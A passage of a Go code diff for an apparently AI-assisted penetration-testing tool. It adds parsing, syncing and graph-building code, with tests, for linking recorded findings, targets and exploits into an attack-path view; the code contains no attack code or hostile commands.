regexp.MustCompile(`(?im)^[\s\-*]*依赖事实\s*[::]\s*([a-zA-Z0-9][a-zA-Z0-9._/-]*)`) + bodyRelFactLine = regexp.MustCompile(`(?im)^[\s\-*]*相关\s*fact_key\s*[::]\s*([a-zA-Z0-9][a-zA-Z0-9._/-]*)`) + bodyAssocSection = regexp.MustCompile(`(?im)^##\s*关联\s*$`) + bodySyncLinksHead = "结构化关系边(自动同步)" +) + +// ParseLinksFromBody 从 body「关联」段落解析 from 语义的关系边(无显式 links 时的兜底)。 +func ParseLinksFromBody(body string) []database.ProjectFactEdgeFromInput { + body = strings.TrimSpace(body) + if body == "" { + return nil + } + seen := map[string]struct{}{} + var out []database.ProjectFactEdgeFromInput + add := func(key, edgeType string) { + key = strings.TrimSpace(key) + if key == "" { + return + } + if err := database.ValidateFactKey(key); err != nil { + return + } + sig := edgeType + "\x00" + key + if _, ok := seen[sig]; ok { + return + } + seen[sig] = struct{}{} + out = append(out, database.ProjectFactEdgeFromInput{From: key, Type: edgeType}) + } + for _, m := range bodyDepFactLine.FindAllStringSubmatch(body, -1) { + if len(m) > 1 { + add(m[1], "depends_on") + } + } + for _, m := range bodyRelFactLine.FindAllStringSubmatch(body, -1) { + if len(m) > 1 { + add(m[1], "supports") + } + } + // 自动同步块:type: key + syncBlock := extractBodySyncLinksBlock(body) + for _, line := range strings.Split(syncBlock, "\n") { + line = strings.TrimSpace(strings.TrimPrefix(strings.TrimSpace(line), "-")) + if line == "" { + continue + } + edgeType, source, ok := strings.Cut(line, ":") + if !ok { + continue + } + edgeType = strings.TrimSpace(edgeType) + source = strings.TrimSpace(source) + if err := database.ValidateProjectFactEdgeType(edgeType); err != nil { + continue + } + add(source, edgeType) + } + if len(out) == 0 { + return nil + } + return out +} + +func extractBodySyncLinksBlock(body string) string { + lines := strings.Split(body, "\n") + var b strings.Builder + inAssoc := false + inSync := false + for _, line := range lines { + trim := strings.TrimSpace(line) + if bodyAssocSection.MatchString(trim) { + inAssoc = true + inSync = false + continue + } + if inAssoc && strings.HasPrefix(trim, "## ") && !strings.HasPrefix(trim, "## 关联") { + break + } + if inAssoc && strings.Contains(trim, bodySyncLinksHead) { + inSync = true + continue + } + if inSync { + if trim == "" || strings.HasPrefix(trim, "-") || strings.Contains(trim, ":") { + if strings.HasPrefix(trim, "-") || (strings.Contains(trim, ":") && !strings.Contains(trim, "related_vulnerability")) { + b.WriteString(trim) + b.WriteByte('\n') + } + } else if strings.HasPrefix(trim, "##") { + break + } + } + } + return b.String() +} + +// SyncBodyLinksSection 将入边镜像写入 body 的「关联」段(人读用;结构化以 links 为准)。 +func SyncBodyLinksSection(body string, edges []*database.ProjectFactEdge) string { + body = strings.TrimSpace(body) + block := formatBodySyncLinksBlock(edges) + if block == "" { + return body + } + if body == "" { + return "## 关联\n" + block + } + lines := strings.Split(body, "\n") + var out []string + inAssoc := false + replaced := false + for i := 0; i < len(lines); i++ { + trim := strings.TrimSpace(lines[i]) + if bodyAssocSection.MatchString(trim) { + inAssoc = true + out = append(out, lines[i]) + // 跳过旧同步块 + j := i + 1 + for j < len(lines) { + t := strings.TrimSpace(lines[j]) + if strings.HasPrefix(t, "## ") { + break + } + if strings.Contains(t, bodySyncLinksHead) { + for j < len(lines) { + t2 := strings.TrimSpace(lines[j]) + if t2 != "" && !strings.HasPrefix(t2, "-") && !strings.Contains(t2, ":") && !strings.Contains(t2, bodySyncLinksHead) { + if strings.HasPrefix(t2, "##") { + break + } + } + j++ + if j < len(lines) && strings.HasPrefix(strings.TrimSpace(lines[j]), "## ") { + break + } + if j >= len(lines) { + break + } + if j > i+1 && strings.TrimSpace(lines[j-1]) == "" && strings.HasPrefix(strings.TrimSpace(lines[j]), "## ") { + break + } + } + break + } + j++ + } + out = append(out, block) + i = j - 1 + replaced = true + continue + } + out = append(out, lines[i]) + } + if !replaced { + if !inAssoc { + out = append(out, "", "## 关联", block) + } else { + out = append(out, block) + } + } + return strings.TrimSpace(strings.Join(out, "\n")) +} + +func formatBodySyncLinksBlock(edges []*database.ProjectFactEdge) string { + if len(edges) == 0 { + return fmt.Sprintf("- %s:\n (暂无)", bodySyncLinksHead) + } + var b strings.Builder + b.WriteString("- ") + b.WriteString(bodySyncLinksHead) + b.WriteString(":\n") + for _, e := range edges { + b.WriteString(fmt.Sprintf(" - %s: %s\n", e.EdgeType, e.SourceFactKey)) + } + return strings.TrimRight(b.String(), "\n") +} + +// ResolveFactLinksForUpsert 合并显式 links、links_text 与 body 解析结果。 +func ResolveFactLinksForUpsert(explicit []database.ProjectFactEdgeFromInput, linksText *string, body string, explicitSet bool) ([]database.ProjectFactEdgeFromInput, bool, error) { + if explicitSet { + if len(explicit) > 0 { + return explicit, true, nil + } + if linksText != nil { + parsed, err := ParseFactLinksText(*linksText) + if err != nil { + return nil, true, err + } + if parsed == nil { + return []database.ProjectFactEdgeFromInput{}, true, nil + } + return parsed, true, nil + } + return []database.ProjectFactEdgeFromInput{}, true, nil + } + if parsed := ParseLinksFromBody(body); len(parsed) > 0 { + return parsed, true, nil + } + return nil, false, nil +} + +// MergeLinkFromInputsUnique 合并多组 from 入边输入并去重。 +func MergeLinkFromInputsUnique(groups ...[]database.ProjectFactEdgeFromInput) []database.ProjectFactEdgeFromInput { + seen := map[string]struct{}{} + var out []database.ProjectFactEdgeFromInput + for _, g := range groups { + for _, in := range g { + sig := in.Type + "\x00" + in.From + if _, ok := seen[sig]; ok { + continue + } + if err := database.ValidateProjectFactEdgeType(in.Type); err != nil { + continue + } + if err := database.ValidateFactKey(in.From); err != nil { + continue + } + seen[sig] = struct{}{} + out = append(out, in) + } + } + return out +} + +// MergeLinkInputsUnique 合并多组 link 输入并去重(内部出边写入用)。 +func MergeLinkInputsUnique(groups ...[]database.ProjectFactEdgeInput) []database.ProjectFactEdgeInput { + seen := map[string]struct{}{} + var out []database.ProjectFactEdgeInput + for _, g := range groups { + for _, in := range g { + sig := in.Type + "\x00" + in.To + if _, ok := seen[sig]; ok { + continue + } + if err := database.ValidateProjectFactEdgeType(in.Type); err != nil { + continue + } + if err := database.ValidateFactKey(in.To); err != nil { + continue + } + seen[sig] = struct{}{} + out = append(out, in) + } + } + return out +} diff --git a/internal/project/fact_body_links_test.go b/internal/project/fact_body_links_test.go new file mode 100644 index 00000000..1b5daa95 --- /dev/null +++ b/internal/project/fact_body_links_test.go @@ -0,0 +1,68 @@ +package project + +import ( + "path/filepath" + "strings" + "testing" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +func TestParseLinksFromBodyDependsOn(t *testing.T) { + t.Parallel() + body := "## 关联\n- 依赖事实: target/api\n- 相关 fact_key: auth/session" + links := ParseLinksFromBody(body) + if len(links) != 2 { + t.Fatalf("want 2 links, got %d", len(links)) + } +} + +func TestSyncBodyLinksSection(t *testing.T) { + t.Parallel() + body := "## 结论\nx\n\n## 关联\n- 依赖事实: old/key" + edges := []*database.ProjectFactEdge{{EdgeType: "discovered_on", SourceFactKey: "target/a"}} + out := SyncBodyLinksSection(body, edges) + if !strings.Contains(out, "discovered_on: target/a") { + t.Fatalf("missing synced edge: %q", out) + } +} + +func TestFactGraphIntegration(t *testing.T) { + dir := t.TempDir() + dbPath := filepath.Join(dir, "test.db") + db, err := database.NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p, err := db.CreateProject(&database.Project{Name: "g"}) + if err != nil { + t.Fatal(err) + } + for _, spec := range []struct{ key, cat, summary string }{ + {"target/root", "target", "root"}, + {"finding/x", "finding", "finding x"}, + } { + _, err := db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: p.ID, FactKey: spec.key, Category: spec.cat, Summary: spec.summary, Confidence: "confirmed", + }) + if err != nil { + t.Fatal(err) + } + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "finding/x", []database.ProjectFactEdgeFromInput{ + {From: "target/root", Type: "discovered_on"}, + }); err != nil { + t.Fatal(err) + } + graph, err := BuildProjectFactGraph(db, p.ID, "path", true) + if err != nil { + t.Fatal(err) + } + if len(graph.Nodes) < 2 || len(graph.Edges) < 1 { + t.Fatalf("expected graph nodes/edges, got %d/%d", len(graph.Nodes), len(graph.Edges)) + } +} diff --git a/internal/project/fact_edges.go b/internal/project/fact_edges.go new file mode 100644 index 00000000..d9d15795 --- /dev/null +++ b/internal/project/fact_edges.go @@ -0,0 +1,407 @@ +package project + +import ( + "fmt" + "strings" + + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/projectprompt" +) + +// PathGraphCategories 攻击路径视图包含的事实分类。 +var PathGraphCategories = map[string]struct{}{ + FactCategoryTarget: {}, + FactCategoryFinding: {}, + FactCategoryChain: {}, + FactCategoryExploit: {}, + FactCategoryPOC: {}, + "vuln": {}, +} + +// GraphNodeType 将 fact category 映射为图节点类型(供前端样式与 ELK 分层)。 +// 优先使用 category;仅 synthetic 节点(vuln:)或无 category 时才回退到 fact_key 前缀。 +func GraphNodeType(category, factKey string) string { + key := strings.ToLower(strings.TrimSpace(factKey)) + if strings.HasPrefix(key, "vuln:") { + return "vulnerability" + } + c := strings.ToLower(strings.TrimSpace(category)) + if c != "" { + switch c { + case FactCategoryTarget: + return "target" + case FactCategoryExploit: + return "exploit" + case FactCategoryPOC: + return "poc" + case FactCategoryChain: + return "chain" + case FactCategoryFinding: + return "finding" + case "vuln": + return "vulnerability" + case FactCategoryAuth: + return "auth" + case FactCategoryInfra, FactCategoryBusiness: + return "infra" + case FactCategoryNote: + return "note" + case "missing": + return "missing" + default: + return c + } + } + switch { + case strings.HasPrefix(key, "target/"): + return "target" + case strings.HasPrefix(key, "exploit/"), strings.HasPrefix(key, "evidence/"): + return "exploit" + case strings.HasPrefix(key, "poc/"): + return "poc" + case strings.HasPrefix(key, "chain/"): + return "chain" + case strings.HasPrefix(key, "finding/"): + return "finding" + case strings.HasPrefix(key, "auth/"): + return "auth" + case strings.HasPrefix(key, "infra/"), strings.HasPrefix(key, "business/"): + return "infra" + default: + return "note" + } +} + +func truncateGraphLabel(summary string, maxRunes int) string { + summary = strings.TrimSpace(summary) + if summary == "" { + return "—" + } + r := []rune(summary) + if len(r) <= maxRunes { + return summary + } + return string(r[:maxRunes]) + "…" +} + +// BuildProjectFactGraph 构建项目事实图(nodes + edges)。 +func BuildProjectFactGraph(db *database.DB, projectID string, view string, excludeDeprecated bool) (*database.ProjectFactGraph, error) { + if db == nil { + return nil, fmt.Errorf("database 未初始化") + } + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return nil, fmt.Errorf("project_id 不能为空") + } + + view = strings.TrimSpace(strings.ToLower(view)) + if view == "" { + view = "path" + } + + filter := database.ProjectFactListFilter{} + if excludeDeprecated { + filter.ExcludeDeprecated = true + } + facts, err := db.ListProjectFacts(projectID, filter, 1000, 0) + if err != nil { + return nil, err + } + + edges, err := db.ListProjectFactEdgesByProject(projectID) + if err != nil { + return nil, err + } + if excludeDeprecated { + edges = filterDeprecatedEdges(edges) + } + + factByKey := make(map[string]*database.ProjectFact, len(facts)) + for _, f := range facts { + factByKey[f.FactKey] = f + } + + pathMode := view == "path" + nodeKeys := make(map[string]struct{}) + + if pathMode { + for _, f := range facts { + if isPathGraphFact(f.Category, f.FactKey) { + nodeKeys[f.FactKey] = struct{}{} + } + } + // 路径视图中保留作为依赖目标的 auth/infra 节点 + for _, e := range edges { + if _, ok := nodeKeys[e.SourceFactKey]; !ok { + continue + } + if f, ok := factByKey[e.TargetFactKey]; ok && isDependencyGraphFact(f.Category, f.FactKey) { + nodeKeys[e.TargetFactKey] = struct{}{} + } + } + } else { + for _, f := range facts { + nodeKeys[f.FactKey] = struct{}{} + } + } + + // 边上引用的 endpoint 纳入节点集 + for _, e := range edges { + if pathMode { + if _, ok := nodeKeys[e.SourceFactKey]; !ok { + continue + } + if _, ok := nodeKeys[e.TargetFactKey]; ok { + // already included + } else if f, ok := factByKey[e.TargetFactKey]; !ok { + nodeKeys[e.TargetFactKey] = struct{}{} // 占位节点 + } else if isPathGraphFact(f.Category, f.FactKey) || isDependencyGraphFact(f.Category, f.FactKey) { + nodeKeys[e.TargetFactKey] = struct{}{} + } else { + continue + } + } else { + nodeKeys[e.SourceFactKey] = struct{}{} + nodeKeys[e.TargetFactKey] = struct{}{} + } + } + + nodes := make([]database.ProjectFactGraphNode, 0, len(nodeKeys)) + for key := range nodeKeys { + if f, ok := factByKey[key]; ok { + nodes = append(nodes, database.ProjectFactGraphNode{ + ID: f.FactKey, + FactKey: f.FactKey, + Category: f.Category, + Label: truncateGraphLabel(f.Summary, 48), + Summary: strings.TrimSpace(f.Summary), + Confidence: f.Confidence, + Type: GraphNodeType(f.Category, f.FactKey), + Pinned: f.Pinned, + }) + continue + } + nodes = append(nodes, database.ProjectFactGraphNode{ + ID: key, + FactKey: key, + Category: "missing", + Label: key, + Confidence: "tentative", + Type: "missing", + Pinned: false, + }) + } + + graphEdges := make([]database.ProjectFactGraphEdge, 0, len(edges)) + for _, e := range edges { + if pathMode { + if _, ok := nodeKeys[e.SourceFactKey]; !ok { + continue + } + if _, ok := nodeKeys[e.TargetFactKey]; !ok { + continue + } + } else { + if _, ok := nodeKeys[e.SourceFactKey]; !ok { + continue + } + if _, ok := nodeKeys[e.TargetFactKey]; !ok { + continue + } + } + graphEdges = append(graphEdges, database.ProjectFactGraphEdge{ + ID: e.ID, + Source: e.SourceFactKey, + Target: e.TargetFactKey, + Type: e.EdgeType, + Confidence: e.Confidence, + }) + } + + // related_vulnerability_id 合成边(source=fact → target=vuln:) + for _, f := range facts { + if _, ok := nodeKeys[f.FactKey]; !ok { + continue + } + vid := strings.TrimSpace(f.RelatedVulnerabilityID) + if vid == "" { + continue + } + vulnNodeID := "vuln:" + vid + if _, exists := nodeKeys[vulnNodeID]; !exists { + nodeKeys[vulnNodeID] = struct{}{} + label := "漏洞" + if len(vid) >= 8 { + label += " " + vid[:8] + "…" + } else { + label += " " + vid + } + nodes = append(nodes, database.ProjectFactGraphNode{ + ID: vulnNodeID, + FactKey: vulnNodeID, + Category: "vuln", + Label: label, + Confidence: f.Confidence, + Type: "vulnerability", + Pinned: false, + }) + } + graphEdges = append(graphEdges, database.ProjectFactGraphEdge{ + ID: "vuln-link:" + f.FactKey + ":" + vid, + Source: f.FactKey, + Target: vulnNodeID, + Type: "links_vuln", + Confidence: f.Confidence, + }) + } + + return &database.ProjectFactGraph{Nodes: nodes, Edges: graphEdges}, nil +} + +func min(a, b int) int { + if a < b { + return a + } + return b +} + +func isPathGraphFact(category, factKey string) bool { + c := strings.ToLower(strings.TrimSpace(category)) + if _, ok := PathGraphCategories[c]; ok { + return true + } + if c != "" { + return false + } + key := strings.ToLower(strings.TrimSpace(factKey)) + for _, p := range []string{"target/", "finding/", "chain/", "exploit/", "poc/", "evidence/"} { + if strings.HasPrefix(key, p) { + return true + } + } + return false +} + +func isDependencyGraphFact(category, factKey string) bool { + c := strings.ToLower(strings.TrimSpace(category)) + if c == FactCategoryAuth || c == FactCategoryInfra || c == FactCategoryBusiness { + return true + } + if c != "" { + return false + } + key := strings.ToLower(strings.TrimSpace(factKey)) + return strings.HasPrefix(key, "auth/") || strings.HasPrefix(key, "infra/") || strings.HasPrefix(key, "business/") +} + +func filterDeprecatedEdges(edges []*database.ProjectFactEdge) []*database.ProjectFactEdge { + out := make([]*database.ProjectFactEdge, 0, len(edges)) + for _, e := range edges { + if strings.EqualFold(strings.TrimSpace(e.Confidence), "deprecated") { + continue + } + out = append(out, e) + } + return out +} + +// ParsedFactLinks 解析 links 参数(from → 当前 fact)。 +type ParsedFactLinks struct { + Incoming []database.ProjectFactEdgeFromInput +} + +// ParseFactLinkInputs 从 MCP links 参数解析;空数组表示清空全部入边。 +func ParseFactLinkInputs(raw interface{}) (*ParsedFactLinks, error) { + if raw == nil { + return nil, nil + } + items, ok := raw.([]interface{}) + if !ok { + return nil, fmt.Errorf("links 须为数组") + } + if len(items) == 0 { + return &ParsedFactLinks{ + Incoming: []database.ProjectFactEdgeFromInput{}, + }, nil + } + parsed := &ParsedFactLinks{} + for i, item := range items { + m, ok := item.(map[string]interface{}) + if !ok { + return nil, fmt.Errorf("links[%d] 格式无效", i) + } + from, _ := m["from"].(string) + edgeType, _ := m["type"].(string) + from = strings.TrimSpace(from) + edgeType = strings.TrimSpace(edgeType) + if from == "" { + return nil, fmt.Errorf("links[%d] 须含 from", i) + } + if edgeType == "" { + return nil, fmt.Errorf("links[%d] 须含 type", i) + } + conf, _ := m["confidence"].(string) + parsed.Incoming = append(parsed.Incoming, database.ProjectFactEdgeFromInput{ + From: from, Type: edgeType, Confidence: strings.TrimSpace(conf), + }) + } + return parsed, nil +} + +// ParseFactLinksText 解析 UI 文本:`type: source_fact_key` 每行一条(from 语义)。 +func ParseFactLinksText(text string) ([]database.ProjectFactEdgeFromInput, error) { + return ParseFactIncomingLinksText(text) +} + +// FormatFactLinksText 将入边格式化为 UI 文本。 +func FormatFactLinksText(edges []*database.ProjectFactEdge) string { + return FormatFactIncomingLinksText(edges) +} + +// ParseFactIncomingLinksText 解析 UI 入边文本:`type: source_fact_key` 每行一条。 +func ParseFactIncomingLinksText(text string) ([]database.ProjectFactEdgeFromInput, error) { + text = strings.TrimSpace(text) + if text == "" { + return nil, nil + } + var out []database.ProjectFactEdgeFromInput + for i, line := range strings.Split(text, "\n") { + line = strings.TrimSpace(line) + if line == "" || strings.HasPrefix(line, "#") { + continue + } + edgeType, source, ok := strings.Cut(line, ":") + if !ok { + return nil, fmt.Errorf("第 %d 行格式无效,应为 type: fact_key", i+1) + } + edgeType = strings.TrimSpace(edgeType) + source = strings.TrimSpace(source) + if edgeType == "" || source == "" { + return nil, fmt.Errorf("第 %d 行 type 或 fact_key 为空", i+1) + } + out = append(out, database.ProjectFactEdgeFromInput{From: source, Type: edgeType}) + } + return out, nil +} + +// FormatFactIncomingLinksText 将入边格式化为 UI 文本。 +func FormatFactIncomingLinksText(edges []*database.ProjectFactEdge) string { + if len(edges) == 0 { + return "" + } + var b strings.Builder + for i, e := range edges { + if i > 0 { + b.WriteByte('\n') + } + b.WriteString(e.EdgeType) + b.WriteString(": ") + b.WriteString(e.SourceFactKey) + } + return b.String() +} + +// FactEdgeRecordingGuidance 写入边时的 Agent 规范。 +func FactEdgeRecordingGuidance() string { + return projectprompt.FactEdgeRecordingGuidance() +} diff --git a/internal/project/fact_edges_apply.go b/internal/project/fact_edges_apply.go new file mode 100644 index 00000000..870861e4 --- /dev/null +++ b/internal/project/fact_edges_apply.go @@ -0,0 +1,96 @@ +package project + +import ( + "cyberstrike-ai/internal/database" +) + +// ApplyFactOutgoingLinks 替换某事实的出边(links 为 nil 时不修改)。 +func ApplyFactOutgoingLinks(db *database.DB, projectID, sourceFactKey, sourceConversationID string, links []database.ProjectFactEdgeInput) error { + if links == nil { + return nil + } + return db.ReplaceOutgoingProjectFactEdges(projectID, sourceFactKey, sourceConversationID, links) +} + +// ResolveFactLinkInputs 合并 links 数组与 links_text 文本(数组优先)。 +func ResolveFactLinkInputs(links []database.ProjectFactEdgeFromInput, linksText string) ([]database.ProjectFactEdgeFromInput, error) { + if len(links) > 0 { + return links, nil + } + return ParseFactLinksText(linksText) +} + +// ApplyFactIncomingLinks 替换某事实的入边(links 为 nil 时不修改)。 +func ApplyFactIncomingLinks(db *database.DB, projectID, targetFactKey string, links []database.ProjectFactEdgeFromInput) error { + if links == nil { + return nil + } + return db.ReplaceIncomingProjectFactEdges(projectID, targetFactKey, links) +} + +// PersistFactIncomingLinks 写入入边并可选同步当前事实 body「关联」段。 +func PersistFactIncomingLinks(db *database.DB, projectID, targetFactKey string, links []database.ProjectFactEdgeFromInput, syncBody bool) error { + if links == nil { + return nil + } + if err := ApplyFactIncomingLinks(db, projectID, targetFactKey, links); err != nil { + return err + } + if !syncBody { + return nil + } + f, err := db.GetProjectFactByKey(projectID, targetFactKey) + if err != nil { + return nil + } + in, err := db.ListIncomingProjectFactEdges(projectID, targetFactKey) + if err != nil { + return err + } + f.Body = SyncBodyLinksSection(f.Body, in) + _, err = db.UpsertProjectFact(f) + return err +} + +// PersistFactLinksFromParsed 写入解析后的 links(parsed 为 nil 表示不修改)。 +func PersistFactLinksFromParsed(db *database.DB, projectID, factKey, sourceConversationID string, parsed *ParsedFactLinks, syncBody bool) error { + if parsed == nil || parsed.Incoming == nil { + return nil + } + return PersistFactIncomingLinks(db, projectID, factKey, parsed.Incoming, syncBody) +} + +// PersistFactOutgoingLinks 写入出边(图连线等低层 API;body 同步请用 PersistFactIncomingLinks)。 +func PersistFactOutgoingLinks(db *database.DB, projectID, sourceFactKey, sourceConversationID string, links []database.ProjectFactEdgeInput, syncBody bool) error { + if links == nil { + return nil + } + return ApplyFactOutgoingLinks(db, projectID, sourceFactKey, sourceConversationID, links) +} + +// LinkCountMap 项目内各 fact 的入/出边计数。 +type LinkCountMap map[string]LinkCounts + +// LinkCounts 单 fact 的入/出边数。 +type LinkCounts struct { + Outgoing int `json:"outgoing"` + Incoming int `json:"incoming"` +} + +// LoadProjectFactLinkCounts 批量加载边计数。 +func LoadProjectFactLinkCounts(db *database.DB, projectID string) (LinkCountMap, error) { + edges, err := db.ListProjectFactEdgesByProject(projectID) + if err != nil { + return nil, err + } + m := LinkCountMap{} + for _, e := range edges { + c := m[e.SourceFactKey] + c.Outgoing++ + m[e.SourceFactKey] = c + c = m[e.TargetFactKey] + c.Incoming++ + m[e.TargetFactKey] = c + } + return m, nil +} diff --git a/internal/project/fact_edges_test.go b/internal/project/fact_edges_test.go new file mode 100644 index 00000000..2e4b3775 --- /dev/null +++ b/internal/project/fact_edges_test.go @@ -0,0 +1,296 @@ +package project + +import ( + "path/filepath" + "testing" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +func TestParseFactLinksText(t *testing.T) { + t.Parallel() + inputs, err := ParseFactLinksText("discovered_on: target/api\nleads_to: finding/swagger") + if err != nil { + t.Fatal(err) + } + if len(inputs) != 2 { + t.Fatalf("want 2 links, got %d", len(inputs)) + } + if inputs[0].Type != "discovered_on" || inputs[0].From != "target/api" { + t.Fatalf("unexpected first link: %+v", inputs[0]) + } +} + +func TestParseFactIncomingLinksText(t *testing.T) { + t.Parallel() + inputs, err := ParseFactIncomingLinksText("leads_to: finding/swagger\ndepends_on: target/api") + if err != nil { + t.Fatal(err) + } + if len(inputs) != 2 { + t.Fatalf("want 2 links, got %d", len(inputs)) + } + if inputs[0].Type != "leads_to" || inputs[0].From != "finding/swagger" { + t.Fatalf("unexpected first link: %+v", inputs[0]) + } +} + +func TestFormatFactIncomingLinksText(t *testing.T) { + t.Parallel() + text := FormatFactIncomingLinksText([]*database.ProjectFactEdge{ + {EdgeType: "leads_to", SourceFactKey: "finding/a"}, + {EdgeType: "depends_on", SourceFactKey: "target/b"}, + }) + want := "leads_to: finding/a\ndepends_on: target/b" + if text != want { + t.Fatalf("got %q want %q", text, want) + } +} + +func TestParseFactLinkInputsEmptyClears(t *testing.T) { + t.Parallel() + parsed, err := ParseFactLinkInputs([]interface{}{}) + if err != nil { + t.Fatal(err) + } + if parsed == nil || parsed.Incoming == nil || len(parsed.Incoming) != 0 { + t.Fatalf("empty array should clear incoming links, got %v", parsed) + } +} + +func TestParseFactLinkInputsFrom(t *testing.T) { + t.Parallel() + raw := []interface{}{ + map[string]interface{}{ + "from": "target/primary_domain", + "type": "discovered_on", + }, + } + parsed, err := ParseFactLinkInputs(raw) + if err != nil { + t.Fatal(err) + } + if len(parsed.Incoming) != 1 || parsed.Incoming[0].From != "target/primary_domain" { + t.Fatalf("unexpected incoming: %+v", parsed.Incoming) + } +} + +func TestParseFactLinkInputsRequiresFrom(t *testing.T) { + t.Parallel() + raw := []interface{}{ + map[string]interface{}{ + "to": "target/primary_domain", + "type": "discovered_on", + }, + } + _, err := ParseFactLinkInputs(raw) + if err == nil { + t.Fatal("expected error when from is missing") + } +} + +func TestGraphNodeType(t *testing.T) { + t.Parallel() + if GraphNodeType("chain", "chain/x") != "chain" { + t.Fatal("chain category") + } + if GraphNodeType("finding", "finding/x") != "finding" { + t.Fatal("finding category") + } + if GraphNodeType("exploit", "exploit/x") != "exploit" { + t.Fatal("exploit category") + } + if GraphNodeType("finding", "evidence/x") != "finding" { + t.Fatal("category should override evidence key prefix") + } + if GraphNodeType("note", "target/x") != "note" { + t.Fatal("category should override target key prefix") + } + if GraphNodeType("vuln", "finding/x") != "vulnerability" { + t.Fatal("vuln category maps to vulnerability node type") + } + if GraphNodeType("", "target/x") != "target" { + t.Fatal("empty category falls back to target key prefix") + } +} + +func TestBuildProjectFactGraphPreservesStoredEdgeDirection(t *testing.T) { + dir := t.TempDir() + db, err := database.NewDB(filepath.Join(dir, "test.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p, err := db.CreateProject(&database.Project{Name: "path-edges"}) + if err != nil { + t.Fatal(err) + } + for _, spec := range []struct{ key, cat string }{ + {"target/primary_domain", "target"}, + {"chain/full_attack_path", "chain"}, + {"finding/mysql_public", "finding"}, + {"exploit/mysql_creds_extract", "exploit"}, + } { + if _, err := db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: p.ID, FactKey: spec.key, Category: spec.cat, Summary: spec.key, Confidence: "confirmed", + }); err != nil { + t.Fatal(err) + } + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "finding/mysql_public", []database.ProjectFactEdgeFromInput{ + {From: "target/primary_domain", Type: "discovered_on"}, + }); err != nil { + t.Fatal(err) + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "finding/mysql_public", []database.ProjectFactEdgeFromInput{ + {From: "target/primary_domain", Type: "discovered_on"}, + {From: "exploit/mysql_creds_extract", Type: "exploits"}, + }); err != nil { + t.Fatal(err) + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "chain/full_attack_path", []database.ProjectFactEdgeFromInput{ + {From: "target/primary_domain", Type: "discovered_on"}, + }); err != nil { + t.Fatal(err) + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "exploit/mysql_creds_extract", []database.ProjectFactEdgeFromInput{ + {From: "chain/full_attack_path", Type: "leads_to"}, + }); err != nil { + t.Fatal(err) + } + + graph, err := BuildProjectFactGraph(db, p.ID, "path", true) + if err != nil { + t.Fatal(err) + } + want := map[string]struct{}{ + "target/primary_domain|discovered_on|finding/mysql_public": {}, + "exploit/mysql_creds_extract|exploits|finding/mysql_public": {}, + "target/primary_domain|discovered_on|chain/full_attack_path": {}, + "chain/full_attack_path|leads_to|exploit/mysql_creds_extract": {}, + } + for _, e := range graph.Edges { + key := e.Source + "|" + e.Type + "|" + e.Target + delete(want, key) + } + if len(want) > 0 { + t.Fatalf("missing expected stored-direction edges: %v", want) + } + countInOut := func(factKey string) (out, in int) { + for _, e := range graph.Edges { + if e.Source == factKey { + out++ + } + if e.Target == factKey { + in++ + } + } + return out, in + } + if out, in := countInOut("chain/full_attack_path"); out != 1 || in != 1 { + t.Fatalf("chain/full_attack_path want out=1 in=1 got out=%d in=%d", out, in) + } + if out, in := countInOut("exploit/mysql_creds_extract"); out != 1 || in != 1 { + t.Fatalf("exploit/mysql_creds_extract want out=1 in=1 got out=%d in=%d", out, in) + } +} + +func TestPersistFactLinksFromUsesFromAsIncoming(t *testing.T) { + dir := t.TempDir() + db, err := database.NewDB(filepath.Join(dir, "test.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p, err := db.CreateProject(&database.Project{Name: "from-links"}) + if err != nil { + t.Fatal(err) + } + for _, spec := range []struct{ key, cat string }{ + {"target/primary_domain", "target"}, + {"finding/sqli", "finding"}, + } { + if _, err := db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: p.ID, FactKey: spec.key, Category: spec.cat, Summary: spec.key, Confidence: "confirmed", + }); err != nil { + t.Fatal(err) + } + } + parsed := &ParsedFactLinks{ + Incoming: []database.ProjectFactEdgeFromInput{ + {From: "target/primary_domain", Type: "discovered_on"}, + }, + } + if err := PersistFactLinksFromParsed(db, p.ID, "finding/sqli", "", parsed, false); err != nil { + t.Fatal(err) + } + graph, err := BuildProjectFactGraph(db, p.ID, "path", true) + if err != nil { + t.Fatal(err) + } + want := "target/primary_domain|discovered_on|finding/sqli" + for _, e := range graph.Edges { + key := e.Source + "|" + e.Type + "|" + e.Target + if key == want { + return + } + } + t.Fatalf("expected edge %s, got %+v", want, graph.Edges) +} + +func TestFormatOutgoingLinksHint(t *testing.T) { + t.Parallel() + hint := FormatOutgoingLinksHint([]*database.ProjectFactEdge{ + {EdgeType: "discovered_on", TargetFactKey: "target/a"}, + }) + if hint == "" || hint[0] != ' ' { + t.Fatalf("unexpected hint: %q", hint) + } +} + +func TestReplaceIncomingAllowsNotYetCreatedSource(t *testing.T) { + dir := t.TempDir() + db, err := database.NewDB(filepath.Join(dir, "test.db"), zap.NewNop()) + if err != nil { + t.Fatal(err) + } + defer db.Close() + + p, err := db.CreateProject(&database.Project{Name: "parallel-links"}) + if err != nil { + t.Fatal(err) + } + if _, err := db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: p.ID, FactKey: "exploit/sqli", Category: "exploit", Summary: "exploit", Confidence: "confirmed", + }); err != nil { + t.Fatal(err) + } + if err := db.ReplaceIncomingProjectFactEdges(p.ID, "exploit/sqli", []database.ProjectFactEdgeFromInput{ + {From: "finding/sqli_endpoint", Type: "exploits"}, + }); err != nil { + t.Fatalf("incoming edge should not require source fact to exist yet: %v", err) + } + if _, err := db.UpsertProjectFact(&database.ProjectFact{ + ProjectID: p.ID, FactKey: "finding/sqli_endpoint", Category: "finding", Summary: "finding", Confidence: "confirmed", + }); err != nil { + t.Fatal(err) + } + in, err := db.ListIncomingProjectFactEdges(p.ID, 